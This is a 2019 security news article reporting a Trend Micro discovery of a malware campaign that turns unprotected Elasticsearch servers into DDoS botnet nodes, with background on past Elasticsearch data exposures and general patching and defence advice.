Posted on July 25, 2019 at 12:13 PM
The new malware attack comprises two phases, including one where existing crypto mining malware is deleted. This is not the first time Elasticsearch databases have displayed how vulnerable they can be.
Trend Micro’s IT security researchers have discovered a brand new malware campaign targeting Elasticsearch databases. These databases store, retrieve, and manage document-oriented and semi-structured information. It relies heavily on flexible data models to construct and update visitor profiles to meet low-latency and demanding workloads needed for real-time engagement. Currently, more than 2000 companies are reported to use ElasticSearch in their tech arsenal, including the well-known firm Uber.
The project takes advantage of publicly available or unprotected Elasticsearch databases and infects them with malware. This, in turn, converts them into botnet zombies, carrying out DDoS attacks.
One occurrence of the outbreak exploited CVE-2015-1427, a prior vulnerability that affected the Elasticsearch Groovy scripting engine. Another came with the capability of exploiting CVE-2017-5638, an RCE (remote code execution) vulnerability within Apache Struts 2.
Researchers found that the malware used is Setag backdoor ware, which was initially discovered in 2017. Setag is armed with capabilities such as launching stealing system data protocols and various DDoS attacks.
Further investigation into the binaries revealed the presence of a backdoor variant that had capabilities similar to that of BillGates malware. The BillGates malware came to light in 2014, bearing the same features as Setag, including compromising the targeted machine and the subsequent launch of DDoS attacks.
This malware attacks in two phases. During the first phase, the malware runs a script (s67.sh) which closes down the firewall and outlines which shell to use. Over the second phase, the malware ran the s66.sh script which deletes specific files including a range of configuration files from the /tmp directory and any existing cryptominers installed by other hazard programs.
This removed traces of the initial infection and downloaded the cybercriminals desired binary. This was all in a bid to run its own sting operation. The researchers commented that they use expendable domains to swap URLs as and when they are detected.
It is worth mentioning that these criminals are utilizing compromised websites to drop their payload. Researchers are concerned that continuing to abuse compromised websites will also allow them to evade detection by websites, particularly those developed by the invaders. Such capabilities of any malware are a huge “red flag.”
These cybercriminals used URL encoding staged when the scripts are recovered, and compromise genuine websites. This could mean they may just be testing their hacking tools. It is also possible that they are readying their infrastructure before escalating to a cyberwar.
ElasticSearch Poor History
Don’t forget, ElasticSearch servers have a poor history with malware. Bob Diachenko, another security researcher, discovered over 4,000 ElasticSearch servers accommodating PoS malware in September 2017. In total Diachenko also identified more than 15,000 ElasticSearch servers that did not have any password or authentication protection.
Then, in November 2018, HackenProof found an IP with a publicly available Elasticsearch cluster that left the personal data of about 57 million US citizens unprotected. Two months after this, Security Discovery found an unprotected Elasticsearch server holding 24 million records of personal data.
More recently, in April 2019, it was reported that thousands of exposed Kibana instances made Elasticsearch databases and servers publicly accessible.
How to Defend Against Attack
Any firm that uses Elasticsearch should be mindful of this new attack. Elasticsearch has issued a patch already to fix this vulnerability; therefore, implement this patch and prevent yourself from being a victim.
Security specialists can assist in defending against attack crusades that seek to deliver a DDoS botnet. They do so by adopting a comprehensive vulnerability management package that prioritizes software patches based on the level of risk detected by known security weaknesses. Businesses should also work to protect against DDoS attacks using anomaly detection, next-generation firewalls, and other applicable tools.